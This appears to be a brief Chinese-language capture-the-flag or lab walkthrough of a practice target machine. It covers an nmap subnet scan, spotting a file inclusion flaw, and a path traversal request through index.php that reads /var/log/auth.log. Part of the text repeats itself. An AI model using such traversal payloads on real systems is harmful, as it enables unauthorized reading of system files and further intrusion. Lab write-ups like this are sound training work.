靶机设置
靶机设置为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机IP为 192.168.112.150
目录扫描
访问浏览器
发现存在文件包含漏洞
因为只开放了ssh和http,尝试查看ssh日志
/index.php?file=../../../../../var/log/auth.log
查看成功
靶机设置为NAT模式
nmap 192.168.112.0/24
靶机IP为 192.168.112.150
发现存在文件包含漏洞
因为只开放了ssh和http,尝试查看ssh日志
/index.php?file=../../../../../var/log/auth.log
查看成功